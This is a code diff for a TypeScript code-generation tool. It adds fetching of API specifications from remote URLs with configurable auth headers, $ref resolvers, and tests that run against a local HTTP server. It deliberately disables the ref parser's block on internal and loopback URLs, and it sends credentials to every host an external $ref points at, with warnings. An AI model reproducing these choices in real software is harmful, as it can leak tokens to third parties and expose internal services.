-    let document: JsonSchemaDocument;
+    let content: string;
+    let contentType: string | null = null;
 
-    if (filePath.endsWith('.json')) {
-      document = JSON.parse(fileContent);
-    } else if (filePath.endsWith('.yaml') || filePath.endsWith('.yml')) {
-      // Import yaml dynamically to avoid circular dependencies
-      const yaml = await import('yaml');
-      document = yaml.parse(fileContent);
+    if (isRemoteUrl(filePath)) {
+      const fetched = await fetchRemoteDocument(filePath, auth);
+      content = fetched.content;
+      contentType = fetched.contentType;
     } else {
-      throw createInputDocumentError({
-        inputPath: filePath,
-        inputType: 'jsonschema',
-        errorMessage: `Unsupported file format. Use .json, .yaml, or .yml`
-      });
+      if (
+        !filePath.endsWith('.json') &&
+        !filePath.endsWith('.yaml') &&
+        !filePath.endsWith('.yml')
+      ) {
+        throw createInputDocumentError({
+          inputPath: filePath,
+          inputType: 'jsonschema',
+          errorMessage: `Unsupported file format. Use .json, .yaml, or .yml`
+        });
+      }
+      content = fs.readFileSync(filePath, 'utf8');
     }
 
+    const document = parseDocument(content, filePath, contentType);
     validateJsonSchemaDocument(document, filePath);
     return document;
   } catch (error) {
+    if ((error as {type?: string})?.type) {
+      throw error;
+    }
     if (error instanceof Error) {
       throw createInputDocumentError({
         inputPath: filePath,
@@ -104,8 +82,32 @@ export async function loadJsonSchemaDocument(
   }
 }
 
+function parseDocument(
+  content: string,
+  source: string,
+  contentType: string | null
+): JsonSchemaDocument {
+  const ct = contentType?.toLowerCase() ?? '';
+  const isYaml =
+    ct.includes('yaml') || source.endsWith('.yaml') || source.endsWith('.yml');
+  const isJson = ct.includes('json') || source.endsWith('.json');
+
+  if (isJson && !isYaml) {
+    return JSON.parse(content);
+  }
+  if (isYaml && !isJson) {
+    return parseYaml(content);
+  }
+  // Ambiguous → JSON-first-then-YAML.
+  try {
+    return JSON.parse(content);
+  } catch {
+    return parseYaml(content);
+  }
+}
+
 /**
- * Load JSON Schema document from memory
+ * Load JSON Schema document from memory.
  */
 export function loadJsonSchemaFromMemory(
   document: JsonSchemaDocument,
@@ -119,7 +121,7 @@ export function loadJsonSchemaFromMemory(
 }
 
 /**
- * Basic validation for JSON Schema document
+ * Basic validation for JSON Schema document.
  */
 function validateJsonSchemaDocument(
   document: JsonSchemaDocument,
@@ -133,7 +135,6 @@ function validateJsonSchemaDocument(
     });
   }
 
-  // Basic JSON Schema structure validation
   if (document.$schema && typeof document.$schema !== 'string') {
     throw createInputDocumentError({
       inputPath: source,
@@ -142,14 +143,12 @@ function validateJsonSchemaDocument(
     });
   }
 
-  // Warn if no $schema is specified
   if (!document.$schema) {
     Logger.warn(
       `JSON Schema document from ${source} does not specify a $schema version. Consider adding one for better validation.`
     );
   }
 
-  // Must have at least type or properties or definitions/$defs to be useful for code generation
   const hasType = document.type !== undefined;
   const hasProperties = document.properties !== undefined;
   const hasDefinitions =

--- a/src/codegen/inputs/openapi/parser.ts
+++ b/src/codegen/inputs/openapi/parser.ts
@@ -1,63 +1,127 @@
-import {parse, dereference} from '@readme/openapi-parser';
-import {RunGeneratorContext} from '../../types';
+import {parse} from '@readme/openapi-parser';
+import $RefParser from '@apidevtools/json-schema-ref-parser';
+import {InputAuthConfig, RunGeneratorContext} from '../../types';
 import {readFileSync} from 'fs';
 import {parse as parseYaml} from 'yaml';
 import {OpenAPIV2, OpenAPIV3, OpenAPIV3_1} from 'openapi-types';
 import {Logger} from '../../../LoggingInterface';
 import {createInputDocumentError} from '../../errors';
+import {isRemoteUrl} from '../../../utils/inputSource';
+import {fetchRemoteDocument} from '../../../utils/remoteFetch';
+import {createOpenapiRefParserResolver} from '../../../utils/refResolvers';
 
 export async function loadOpenapi(
   context: RunGeneratorContext
 ): Promise<OpenAPIV3.Document | OpenAPIV2.Document | OpenAPIV3_1.Document> {
-  const documentPath = context.documentPath;
-  return loadOpenapiDocument(documentPath);
+  return loadOpenapiDocument(context.documentPath, context.inputAuth);
 }
 
 export async function loadOpenapiDocument(
-  documentPath: string
+  documentPath: string,
+  auth?: InputAuthConfig
 ): Promise<OpenAPIV3.Document | OpenAPIV2.Document | OpenAPIV3_1.Document> {
   Logger.verbose(`Loading OpenAPI document from ${documentPath}`);
   try {
-    // Read the file content
     let documentContent: string;
-    try {
-      documentContent = readFileSync(documentPath, 'utf-8');
-    } catch (error) {
-      throw createInputDocumentError({
-        inputPath: documentPath,
-        inputType: 'openapi',
-        errorMessage: `Could not read file: ${error}`
-      });
-    }
+    let contentType: string | null = null;
 
-    // Parse the document (support both JSON and YAML)
-    let document: any;
-    try {
-      if (documentPath.endsWith('.yaml') || documentPath.endsWith('.yml')) {
-        document = parseYaml(documentContent);
-      } else {
-        document = JSON.parse(documentContent);
+    if (isRemoteUrl(documentPath)) {
+      const fetched = await fetchRemoteDocument(documentPath, auth);
+      documentContent = fetched.content;
+      contentType = fetched.contentType;
+    } else {
+      try {
+        documentContent = readFileSync(documentPath, 'utf-8');
+      } catch (error) {
+        throw createInputDocumentError({
+          inputPath: documentPath,
+          inputType: 'openapi',
+          errorMessage: `Could not read file: ${error}`
+        });
       }
-    } catch (error) {
-      throw createInputDocumentError({
-        inputPath: documentPath,
-        inputType: 'openapi',
-        errorMessage: `Could not parse document: ${error}`
-      });
     }
 
-    // Parse and validate the OpenAPI document
-    const parsedDocument = await parse(document);
+    const document = parseDocumentContent(
+      documentContent,
+      documentPath,
+      contentType
+    );
 
-    // Dereference all $ref pointers to get a fully resolved document
-    const result = await dereference(parsedDocument);
+    let dereferenced: any;
+    if (isRemoteUrl(documentPath)) {
+      // Use $RefParser directly so cross-spec $refs go through our
+      // auth-aware http resolver. The root document is already in memory.
+      const refParser = new $RefParser();
+      dereferenced = await refParser.dereference(documentPath, document, {
+        resolve: {
+          http: createOpenapiRefParserResolver(auth, {rootUrl: documentPath})
+        }
+      });
+    } else {
+      // Local file path: keep the existing @readme/openapi-parser flow
+      // which handles file:// $refs via the built-in resolver.
+      const parsedDocument = await parse(document);
+      const {dereference} = await import('@readme/openapi-parser');
+      dereferenced = await dereference(parsedDocument);
+    }
+
+    // Run @readme/openapi-parser validation on the (already-dereferenced)
+    // document so we still get OpenAPI 3.x-spec-aware error messages.
+    if (isRemoteUrl(documentPath)) {
+      try {
+        await parse(JSON.parse(JSON.stringify(dereferenced)));
+      } catch (validationError) {
+        Logger.debug(
+          `OpenAPI validation warning after dereferencing: ${validationError}`
+        );
+      }
+    }
+
     Logger.debug(`OpenAPI document loaded and dereferenced`);
-    return result;
+    return dereferenced;
+  } catch (error) {
+    if ((error as {type?: string})?.type) {
+      // Already a CodegenError from a sub-step
+      throw error;
+    }
+    throw createInputDocumentError({
+      inputPath: documentPath,
+      inputType: 'openapi',
+      errorMessage: error instanceof Error ? error.message : String(error)
+    });
+  }
+}
+
+function parseDocumentContent(
+  content: string,
+  documentPath: string,
+  contentType: string | null
+): any {
+  const ct = contentType?.toLowerCase() ?? '';
+  const isYaml =
+    ct.includes('yaml') ||
+    documentPath.endsWith('.yaml') ||
+    documentPath.endsWith('.yml');
+  const isJson = ct.includes('json') || documentPath.endsWith('.json');
+
+  try {
+    if (isYaml && !isJson) {
+      return parseYaml(content);
+    }
+    if (isJson) {
+      return JSON.parse(content);
+    }
+    // Ambiguous: try JSON first, then YAML.
+    try {
+      return JSON.parse(content);
+    } catch {
+      return parseYaml(content);
+    }
   } catch (error) {
     throw createInputDocumentError({
       inputPath: documentPath,
       inputType: 'openapi',
-      errorMessage: String(error)
+      errorMessage: `Could not parse document: ${error}`
     });
   }
 }

--- a/src/codegen/types.ts
+++ b/src/codegen/types.ts
@@ -218,6 +218,41 @@ const INPUT_PATH_DESCRIPTION =
   'Path or URL to the input document used as the source for code generation. [Read more about configurations here](https://the-codegen-project.org/docs/configurations)';
 const GENERATORS_DESCRIPTION =
   'The list of generators to run as part of this configuration. [Read more about generators here](https://the-codegen-project.org/docs/generators)';
+const INPUT_AUTH_DESCRIPTION =
+  'Authentication for fetching remote input specifications via http(s). Ignored for local file paths. ' +
+  'WARNING: these credentials are sent to every URL the loader fetches, including external $ref targets on other hosts. ' +
+  'See https://the-codegen-project.org/docs/configurations#auth-scope-and-security-considerations for details.';
+
+/**
+ * Authentication configuration for fetching remote input documents.
+ * One of three shapes:
+ *  - bearer: adds `Authorization: Bearer <token>`.
+ *  - apiKey: adds `<header>: <value>`.
+ *  - custom: adds the given headers verbatim.
+ *
+ * The same headers are attached to every URL the loader fetches,
+ * including external `$ref` targets on other hosts.
+ */
+export const zodInputAuth = z
+  .discriminatedUnion('type', [
+    z.object({
+      type: z.literal('bearer'),
+      token: z.string().min(1)
+    }),
+    z.object({
+      type: z.literal('apiKey'),
+      header: z.string().min(1),
+      value: z.string().min(1)
+    }),
+    z.object({
+      type: z.literal('custom'),
+      headers: z.record(z.string(), z.string())
+    })
+  ])
+  .optional()
+  .describe(INPUT_AUTH_DESCRIPTION);
+
+export type InputAuthConfig = z.infer<typeof zodInputAuth>;
 
 // Re-export from utils - the canonical source of truth for import extension
 export {zodImportExtension, ImportExtension} from './utils';
@@ -275,6 +310,7 @@ export const zodAsyncAPITypescriptConfig = z.object({
   $schema: z.string().optional().describe(SCHEMA_DESCRIPTION),
   inputType: z.literal('asyncapi').describe(DOCUMENT_TYPE_DESCRIPTION),
   inputPath: z.string().describe(INPUT_PATH_DESCRIPTION),
+  auth: zodInputAuth,
   ...zodTypeScriptConfigOptions,
   generators: z
     .array(zodAsyncAPITypeScriptGenerators)
@@ -300,6 +336,7 @@ export const zodOpenAPITypescriptConfig = z.object({
   $schema: z.string().optional().describe(SCHEMA_DESCRIPTION),
   inputType: z.literal('openapi').describe(DOCUMENT_TYPE_DESCRIPTION),
   inputPath: z.string().describe(INPUT_PATH_DESCRIPTION),
+  auth: zodInputAuth,
   ...zodTypeScriptConfigOptions,
   generators: z
     .array(zodOpenAPITypeScriptGenerators)
@@ -321,6 +358,7 @@ export const zodJsonSchemaTypescriptConfig = z.object({
   $schema: z.string().optional().describe(SCHEMA_DESCRIPTION),
   inputType: z.literal('jsonschema').describe(DOCUMENT_TYPE_DESCRIPTION),
   inputPath: z.string().describe(INPUT_PATH_DESCRIPTION),
+  auth: zodInputAuth,
   ...zodTypeScriptConfigOptions,
   generators: z
     .array(zodJsonSchemaTypeScriptGenerators)
@@ -356,6 +394,11 @@ export interface RunGeneratorContext {
   configuration: TheCodegenConfiguration;
   configFilePath: string;
   documentPath: string;
+  /**
+   * Authentication carried into the input loaders when `documentPath` is
+   * a remote URL. Populated from `config.auth` in `realizeGeneratorContext`.
+   */
+  inputAuth?: InputAuthConfig;
   asyncapiDocument?: AsyncAPIDocumentInterface;
   openapiDocument?:
     | OpenAPIV3.Document

--- a/src/commands/generate.ts
+++ b/src/commands/generate.ts
@@ -9,6 +9,7 @@ import {realizeGeneratorContext} from '../codegen/configurations';
 import {CodegenError, createGeneratorError} from '../codegen/errors';
 import {trackEvent} from '../telemetry';
 import {getInputSourceType, categorizeError} from '../telemetry/anonymize';
+import {isRemoteUrl} from '../utils/inputSource';
 import {GenerationResult, RunGeneratorContext} from '../codegen';
 import {BaseCommand} from './base';
 import pc from 'picocolors';
@@ -197,11 +198,22 @@ export default class Generate extends BaseCommand {
       pathToWatch = path.resolve(watchPath);
     } else {
       // Get the input file path from configuration
-      const context = await realizeGeneratorContext(configFile);
-      pathToWatch = context.documentPath;
+      const watchContext = await realizeGeneratorContext(configFile);
+      pathToWatch = watchContext.documentPath;
     }
 
     const useColors = !flags['no-color'];
+
+    // Watch mode degrades gracefully for URL inputs: chokidar can only
+    // observe the local filesystem, so skip it and warn the user.
+    if (isRemoteUrl(pathToWatch)) {
+      Logger.warn(
+        `Watch mode: input is a remote URL — skipping input watcher. Use --watchPath to trigger regeneration on local file changes.`
+      );
+      // Keep the process alive so users can still ^C cleanly.
+      return new Promise<void>(() => undefined);
+    }
+
     Logger.info(
       `\nWatching for changes in: ${useColors ? pc.cyan(pathToWatch) : pathToWatch}`
     );

--- a/src/telemetry/anonymize.ts
+++ b/src/telemetry/anonymize.ts
@@ -1,29 +1,10 @@
 /* eslint-disable no-undef */
-import path from 'path';
-
 /**
- * Detect the type of input source without exposing the actual path.
- * This ensures we track usage patterns while respecting user privacy.
- *
- * @param inputPath - The input path to analyze
- * @returns The type of input source (remote_url, local_relative, or local_absolute)
+ * Re-export the canonical helper from `src/utils/inputSource.ts`. The
+ * telemetry surface is unchanged; the helper now lives next to the rest
+ * of the URL-detection code so it can be shared with the input loaders.
  */
-export function getInputSourceType(
-  inputPath: string
-): 'remote_url' | 'local_relative' | 'local_absolute' {
-  // Check if it's a URL (http:// or https://)
-  if (inputPath.startsWith('http://') || inputPath.startsWith('https://')) {
-    return 'remote_url';
-  }
-
-  // Check if it's an absolute path
-  if (path.isAbsolute(inputPath)) {
-    return 'local_absolute';
-  }
-
-  // Otherwise it's a relative path
-  return 'local_relative';
-}
+export {getInputSourceType} from '../utils/inputSource';
 
 /**
  * Detect if running in a CI environment.

--- a/src/utils/inputSource.ts
+++ b/src/utils/inputSource.ts
@@ -1,0 +1,25 @@
+/**
+ * Helpers for classifying an input path as a remote URL or a local
+ * filesystem path. Used at the configuration layer to decide whether to
+ * pass the path through `path.resolve` (local) or untouched (remote).
+ */
+import path from 'path';
+
+export type InputSourceType =
+  | 'remote_url'
+  | 'local_relative'
+  | 'local_absolute';
+
+export function isRemoteUrl(inputPath: string): boolean {
+  return inputPath.startsWith('http://') || inputPath.startsWith('https://');
+}
+
+export function getInputSourceType(inputPath: string): InputSourceType {
+  if (isRemoteUrl(inputPath)) {
+    return 'remote_url';
+  }
+  if (path.isAbsolute(inputPath)) {
+    return 'local_absolute';
+  }
+  return 'local_relative';
+}

--- a/src/utils/refResolvers.ts
+++ b/src/utils/refResolvers.ts
@@ -1,0 +1,115 @@
+/* eslint-disable no-undef */
+/**
+ * Custom http/https resolver factories for cross-spec `$ref`
+ * dereferencing. Both factories delegate to `fetchRemoteDocument` so the
+ * same auth headers are attached to every resolved reference.
+ *
+ * - `createOpenapiRefParserResolver` returns the `resolve.http` shape
+ *   expected by `@apidevtools/json-schema-ref-parser`.
+ * - `createAsyncapiResolvers` returns the resolver array expected by
+ *   `@asyncapi/parser`'s `__unstable.resolver` option (Spectral resolver
+ *   shape, `read(uri): string | undefined | Promise<string | undefined>`).
+ *
+ * Both factories emit a debug log per fetched URL, and an info-level
+ * warning the first time auth headers are sent to a host that differs
+ * from the root document's host.
+ */
+import {fetchRemoteDocument} from './remoteFetch';
+import {InputAuthConfig} from '../codegen/types';
+import {Logger} from '../LoggingInterface';
+
+export interface RefResolverContext {
+  /** The URL of the root input document — used to detect cross-host fetches. */
+  rootUrl: string;
+}
+
+interface OpenapiHttpResolver {
+  order: number;
+  canRead: (file: {url: string}) => boolean;
+  read: (file: {url: string}) => Promise<string>;
+  /**
+   * v14 of @apidevtools/json-schema-ref-parser blocks loopback / internal
+   * URLs (127.0.0.1, localhost, etc.) by default. We trust the user's
+   * inputPath, so disable the safe-url check.
+   */
+  safeUrlResolver: false;
+}
+
+interface AsyncapiResolver {
+  schema: 'http' | 'https';
+  read: (uri: {toString(): string}) => Promise<string>;
+}
+
+function rootHost(rootUrl: string): string | undefined {
+  try {
+    return new URL(rootUrl).host;
+  } catch {
+    return undefined;
+  }
+}
+
+function createCrossHostWarner(
+  rootUrl: string,
+  hasAuth: boolean
+): (refUrl: string) => void {
+  const root = rootHost(rootUrl);
+  const warnedHosts = new Set<string>();
+  return (refUrl: string) => {
+    if (!hasAuth || !root) {
+      return;
+    }
+    let refUrlHost: string | undefined;
+    try {
+      refUrlHost = new URL(refUrl).host;
+    } catch {
+      return;
+    }
+    if (!refUrlHost || refUrlHost === root) {
+      return;
+    }
+    if (warnedHosts.has(refUrlHost)) {
+      return;
+    }
+    warnedHosts.add(refUrlHost);
+    Logger.info(
+      `[remote-fetch] auth headers sent to '${refUrlHost}' while resolving $ref from '${root}'. If this is unexpected, review the spec.`
+    );
+  };
+}
+
+export function createOpenapiRefParserResolver(
+  auth: InputAuthConfig | undefined,
+  context: RefResolverContext
+): OpenapiHttpResolver {
+  const warn = createCrossHostWarner(context.rootUrl, Boolean(auth));
+  return {
+    order: 1,
+    safeUrlResolver: false,
+    canRead: (file: {url: string}): boolean =>
+      file.url.startsWith('http://') || file.url.startsWith('https://'),
+    read: async (file: {url: string}): Promise<string> => {
+      Logger.debug(`[remote-fetch] $ref ${file.url}`);
+      warn(file.url);
+      const {content} = await fetchRemoteDocument(file.url, auth);
+      return content;
+    }
+  };
+}
+
+export function createAsyncapiResolvers(
+  auth: InputAuthConfig | undefined,
+  context: RefResolverContext
+): AsyncapiResolver[] {
+  const warn = createCrossHostWarner(context.rootUrl, Boolean(auth));
+  const read = async (uri: {toString(): string}): Promise<string> => {
+    const url = uri.toString();
+    Logger.debug(`[remote-fetch] $ref ${url}`);
+    warn(url);
+    const {content} = await fetchRemoteDocument(url, auth);
+    return content;
+  };
+  return [
+    {schema: 'http', read},
+    {schema: 'https', read}
+  ];
+}

--- a/src/utils/remoteFetch.ts
+++ b/src/utils/remoteFetch.ts
@@ -1,0 +1,86 @@
+/* eslint-disable no-undef */
+/**
+ * Fetches a remote document over http(s) with optional auth headers,
+ * a timeout, and typed errors. Used by every input parser when
+ * `inputPath` is a URL.
+ *
+ * SECURITY NOTE: When `auth` is configured, the headers are sent to
+ * **every** URL fetched through this helper, including external `$ref`
+ * targets on other hosts. See docs/configurations#auth-scope for details.
+ */
+import {InputAuthConfig} from '../codegen/types';
+import {CodegenError, createRemoteFetchError} from '../codegen/errors';
+import {Logger} from '../LoggingInterface';
+
+export interface FetchedDocument {
+  content: string;
+  contentType: string | null;
+  finalUrl: string;
+}
+
+const DEFAULT_TIMEOUT_MS = 30_000;
+
+export async function fetchRemoteDocument(
+  url: string,
+  auth?: InputAuthConfig,
+  options: {timeoutMs?: number} = {}
+): Promise<FetchedDocument> {
+  Logger.debug(`[remote-fetch] GET ${url}`);
+
+  const controller = new AbortController();
+  const timeoutMs = options.timeoutMs ?? DEFAULT_TIMEOUT_MS;
+  const timer = setTimeout(() => controller.abort(), timeoutMs);
+
+  try {
+    const response = await fetch(url, {
+      method: 'GET',
+      headers: buildAuthHeaders(auth),
+      signal: controller.signal,
+      redirect: 'follow'
+    });
+    if (!response.ok) {
+      throw createRemoteFetchError({
+        url,
+        status: response.status,
+        statusText: response.statusText,
+        reason: 'http'
+      });
+    }
+    const content = await response.text();
+    return {
+      content,
+      contentType: response.headers.get('content-type'),
+      finalUrl: response.url || url
+    };
+  } catch (cause) {
+    if (cause instanceof CodegenError) {
+      throw cause;
+    }
+    if (
+      cause instanceof Error &&
+      (cause.name === 'AbortError' ||
+        cause.message?.toLowerCase().includes('aborted'))
+    ) {
+      throw createRemoteFetchError({url, reason: 'timeout', cause});
+    }
+    throw createRemoteFetchError({url, reason: 'network', cause});
+  } finally {
+    clearTimeout(timer);
+  }
+}
+
+function buildAuthHeaders(auth?: InputAuthConfig): Record<string, string> {
+  if (!auth) {
+    return {};
+  }
+  switch (auth.type) {
+    case 'bearer':
+      return {Authorization: `Bearer ${auth.token}`};
+    case 'apiKey':
+      return {[auth.header]: auth.value};
+    case 'custom':
+      return {...auth.headers};
+    default:
+      return {};
+  }
+}

--- a/test/codegen/configurations.spec.ts
+++ b/test/codegen/configurations.spec.ts
@@ -8,7 +8,8 @@ const CONFIG_JSON = path.resolve(__dirname, '../configs/config.json');
 const CONFIG_YAML = path.resolve(__dirname, '../configs/config.yaml');
 const CONFIG_TS = path.resolve(__dirname, '../configs/config.ts');
 const FULL_CONFIG = path.resolve(__dirname, '../configs/config-all.js');
-import { loadAndRealizeConfigFile, loadConfigFile, realizeConfiguration } from '../../src/codegen/configurations';
+import { loadAndRealizeConfigFile, loadConfigFile, realizeConfiguration, realizeGeneratorContext } from '../../src/codegen/configurations';
+import { zodTheCodegenConfiguration } from '../../src/codegen/types';
 import { Logger } from '../../src/LoggingInterface.ts';
 import { detectTypeScriptImportExtension } from '../../src/codegen/detection';
 jest.mock('node:fs/promises', () => ({
@@ -273,6 +274,148 @@ describe('configuration manager', () => {
 
       const detected = await detectTypeScriptImportExtension(tempDir);
       expect(detected).toBe('.ts');
+    });
+  });
+
+  describe('remote URL inputPath passthrough', () => {
+    let tempDir: string;
+    let fetchSpy: jest.SpyInstance;
+
+    beforeEach(() => {
+      tempDir = fs.mkdtempSync(path.join(os.tmpdir(), 'codegen-remote-url-'));
+      fetchSpy = jest.spyOn(globalThis, 'fetch') as jest.SpyInstance;
+      fetchSpy.mockResolvedValue(
+        new Response(
+          JSON.stringify({ $schema: 'http://json-schema.org/draft-07/schema#', type: 'object', properties: {} }),
+          { status: 200, headers: { 'content-type': 'application/json' } }
+        )
+      );
+    });
+
+    afterEach(() => {
+      fs.rmSync(tempDir, { recursive: true, force: true });
+      fetchSpy.mockRestore();
+    });
+
+    it('does not path.resolve a remote URL inputPath', async () => {
+      const configPath = path.join(tempDir, 'codegen.json');
+      fs.writeFileSync(
+        configPath,
+        JSON.stringify({
+          inputType: 'jsonschema',
+          inputPath: 'https://example.com/schema.json',
+          language: 'typescript',
+          generators: []
+        })
+      );
+
+      const ctx = await realizeGeneratorContext(configPath);
+      expect(ctx.documentPath).toBe('https://example.com/schema.json');
+    });
+
+    it('threads inputAuth onto the context for URL inputs', async () => {
+      const configPath = path.join(tempDir, 'codegen.js');
+      fs.writeFileSync(
+        configPath,
+        `module.exports = {
+          inputType: 'jsonschema',
+          inputPath: 'https://example.com/schema.json',
+          language: 'typescript',
+          auth: { type: 'bearer', token: 'tok' },
+          generators: []
+        };`
+      );
+
+      const ctx = await realizeGeneratorContext(configPath);
+      expect(ctx.inputAuth).toEqual({ type: 'bearer', token: 'tok' });
+      // Verify fetch saw the bearer header
+      const init = fetchSpy.mock.calls[0][1] as RequestInit;
+      const headers = new Headers(init.headers);
+      expect(headers.get('authorization')).toBe('Bearer tok');
+    });
+  });
+
+  describe('zodInputAuth shape', () => {
+    const baseAsyncapi = {
+      inputType: 'asyncapi' as const,
+      inputPath: 'https://example.com/asyncapi.yaml',
+      language: 'typescript' as const,
+      generators: []
+    };
+
+    it('accepts no auth (undefined)', () => {
+      expect(() =>
+        zodTheCodegenConfiguration.parse({ ...baseAsyncapi })
+      ).not.toThrow();
+    });
+
+    it('accepts bearer auth', () => {
+      expect(() =>
+        zodTheCodegenConfiguration.parse({
+          ...baseAsyncapi,
+          auth: { type: 'bearer', token: 'abc' }
+        })
+      ).not.toThrow();
+    });
+
+    it('accepts apiKey auth', () => {
+      expect(() =>
+        zodTheCodegenConfiguration.parse({
+          ...baseAsyncapi,
+          auth: { type: 'apiKey', header: 'X-API-Key', value: 'k' }
+        })
+      ).not.toThrow();
+    });
+
+    it('accepts custom headers auth', () => {
+      expect(() =>
+        zodTheCodegenConfiguration.parse({
+          ...baseAsyncapi,
+          auth: { type: 'custom', headers: { Authorization: 'Bearer abc' } }
+        })
+      ).not.toThrow();
+    });
+
+    it('rejects bearer auth missing token', () => {
+      expect(() =>
+        zodTheCodegenConfiguration.parse({
+          ...baseAsyncapi,
+          auth: { type: 'bearer' }
+        })
+      ).toThrow();
+    });
+
+    it('rejects unknown auth type', () => {
+      expect(() =>
+        zodTheCodegenConfiguration.parse({
+          ...baseAsyncapi,
+          auth: { type: 'oauth', token: 'abc' }
+        })
+      ).toThrow();
+    });
+
+    it('accepts auth on openapi input branch', () => {
+      expect(() =>
+        zodTheCodegenConfiguration.parse({
+          inputType: 'openapi',
+          inputPath: 'https://example.com/openapi.yaml',
+          language: 'typescript',
+          auth: { type: 'bearer', token: 'abc' },
+          generators: []
+        })
+      ).not.toThrow();
+    });
+
+    it('accepts auth on jsonschema input branch', () => {
+      expect(() =>
+        zodTheCodegenConfiguration.parse({
+          inputType: 'jsonschema',
+          inputPath: 'https://example.com/schema.json',
+          language: 'typescript',
+          auth: { type: 'apiKey', header: 'X-API-Key', value: 'k' },
+          generators: []
+        })
+      ).not.toThrow();
     });
   });
 });

--- a/test/codegen/inputs/__helpers__/httpServer.ts
+++ b/test/codegen/inputs/__helpers__/httpServer.ts
@@ -1,0 +1,96 @@
+/* eslint-disable no-undef, security/detect-object-injection */
+import http from 'http';
+import {AddressInfo} from 'net';
+import fs from 'fs';
+import path from 'path';
+
+export interface RecordedRequest {
+  url: string;
+  method: string;
+  headers: Record<string, string | string[] | undefined>;
+}
+
+export interface TestRoute {
+  path: string;
+  status?: number;
+  body: string;
+  contentType?: string;
+  /** if set, request must include this header (case-insensitive name); else server returns 401 */
+  requireHeader?: {name: string; value: string};
+}
+
+export interface TestServer {
+  url: string;
+  port: number;
+  requests: RecordedRequest[];
+  close: () => Promise<void>;
+}
+
+/**
+ * Starts a real http server bound to 127.0.0.1 on a random port.
+ * Routes are matched by URL pathname. Unknown paths return 404.
+ */
+export async function startTestServer(routes: TestRoute[]): Promise<TestServer> {
+  const requests: RecordedRequest[] = [];
+
+  const server = http.createServer((req, res) => {
+    const recorded: RecordedRequest = {
+      url: req.url ?? '',
+      method: req.method ?? 'GET',
+      headers: {...req.headers}
+    };
+    requests.push(recorded);
+
+    const route = routes.find((r) => r.path === (req.url ?? '').split('?')[0]);
+    if (!route) {
+      res.writeHead(404, {'content-type': 'text/plain'});
+      res.end(`Not found: ${req.url}`);
+      return;
+    }
+
+    if (route.requireHeader) {
+      const lower = route.requireHeader.name.toLowerCase();
+      const got = req.headers[lower];
+      if (got !== route.requireHeader.value) {
+        res.writeHead(401, {'content-type': 'text/plain'});
+        res.end('Unauthorized');
+        return;
+      }
+    }
+
+    const headers: Record<string, string> = {};
+    if (route.contentType) {
+      headers['content-type'] = route.contentType;
+    }
+    res.writeHead(route.status ?? 200, headers);
+    res.end(route.body);
+  });
+
+  await new Promise<void>((resolve) => {
+    server.listen(0, '127.0.0.1', () => resolve());
+  });
+
+  const address = server.address() as AddressInfo;
+  const port = address.port;
+  const url = `http://127.0.0.1:${port}`;
+
+  return {
+    url,
+    port,
+    requests,
+    close: () =>
+      new Promise<void>((resolve, reject) => {
+        server.close((err) => (err ? reject(err) : resolve()));
+      })
+  };
+}
+
+/**
+ * Reads a fixture file from test/configs/remote-url/.
+ */
+export function readFixture(name: string): string {
+  return fs.readFileSync(
+    path.resolve(__dirname, '../../../configs/remote-url', name),
+    'utf-8'
+  );
+}

--- a/test/codegen/inputs/asyncapi.spec.ts
+++ b/test/codegen/inputs/asyncapi.spec.ts
@@ -1,0 +1,82 @@
+import {loadAsyncapi} from '../../../src/codegen/inputs/asyncapi';
+import {RunGeneratorContext} from '../../../src/codegen/types';
+import {startTestServer, readFixture} from './__helpers__/httpServer';
+
+describe('AsyncAPI loader URL support', () => {
+  it('loads an asyncapi document from a remote URL', async () => {
+    const fixture = readFixture('asyncapi.yaml');
+    const server = await startTestServer([
+      {path: '/asyncapi.yaml', body: fixture, contentType: 'application/yaml'}
+    ]);
+    try {
+      const context: RunGeneratorContext = {
+        configuration: {
+          inputType: 'asyncapi',
+          inputPath: `${server.url}/asyncapi.yaml`,
+          generators: []
+        },
+        configFilePath: 'codegen.json',
+        documentPath: `${server.url}/asyncapi.yaml`
+      };
+      const document = await loadAsyncapi(context);
+      expect(document).toBeDefined();
+      expect(document?.info().title()).toBe('Remote URL Test');
+    } finally {
+      await server.close();
+    }
+  });
+
+  it('sends the bearer auth header when configured', async () => {
+    const fixture = readFixture('asyncapi.yaml');
+    const server = await startTestServer([
+      {
+        path: '/asyncapi.yaml',
+        body: fixture,
+        contentType: 'application/yaml',
+        requireHeader: {name: 'authorization', value: 'Bearer abc'}
+      }
+    ]);
+    try {
+      const context: RunGeneratorContext = {
+        configuration: {
+          inputType: 'asyncapi',
+          inputPath: `${server.url}/asyncapi.yaml`,
+          generators: []
+        },
+        configFilePath: 'codegen.json',
+        documentPath: `${server.url}/asyncapi.yaml`,
+        inputAuth: {type: 'bearer', token: 'abc'}
+      };
+      await expect(loadAsyncapi(context)).resolves.toBeDefined();
+      expect(server.requests).toHaveLength(1);
+      const req = server.requests[0]!;
+      expect(req.headers['authorization']).toBe('Bearer abc');
+    } finally {
+      await server.close();
+    }
+  });
+
+  it('throws when remote returns 401', async () => {
+    const server = await startTestServer([
+      {
+        path: '/asyncapi.yaml',
+        body: 'unauth',
+        requireHeader: {name: 'authorization', value: 'Bearer expected'}
+      }
+    ]);
+    try {
+      const context: RunGeneratorContext = {
+        configuration: {
+          inputType: 'asyncapi',
+          inputPath: `${server.url}/asyncapi.yaml`,
+          generators: []
+        },
+        configFilePath: 'codegen.json',
+        documentPath: `${server.url}/asyncapi.yaml`
+      };
+      await expect(loadAsyncapi(context)).rejects.toThrow();
+    } finally {
+      await server.close();
+    }
+  });
+});

--- a/test/codegen/inputs/jsonschema.test.ts
+++ b/test/codegen/inputs/jsonschema.test.ts
@@ -1,12 +1,17 @@
-import {loadJsonSchemaFromMemory, loadJsonSchemaDocument} from '../../../src/codegen/inputs/jsonschema';
+import {loadJsonSchema, loadJsonSchemaFromMemory, loadJsonSchemaDocument} from '../../../src/codegen/inputs/jsonschema';
 import * as path from 'path';
 import * as fs from 'fs';
 import * as os from 'os';
+import {RunGeneratorContext} from '../../../src/codegen/types';
+import {startTestServer} from './__helpers__/httpServer';
+
+const DRAFT_07 = 'http://json-schema.org/draft-07/schema#';
+const CONFIG_FILE = 'codegen.json';
 
 describe('JSON Schema Input Processing', () => {
   test('should load valid JSON Schema from memory', () => {
     const schema = {
-      $schema: 'http://json-schema.org/draft-07/schema#',
+      $schema: DRAFT_07,
       type: 'object',
       properties: {
         name: { type: 'string' },
@@ -34,7 +39,7 @@ describe('JSON Schema Input Processing', () => {
   test('should load JSON Schema from JSON file', async () => {
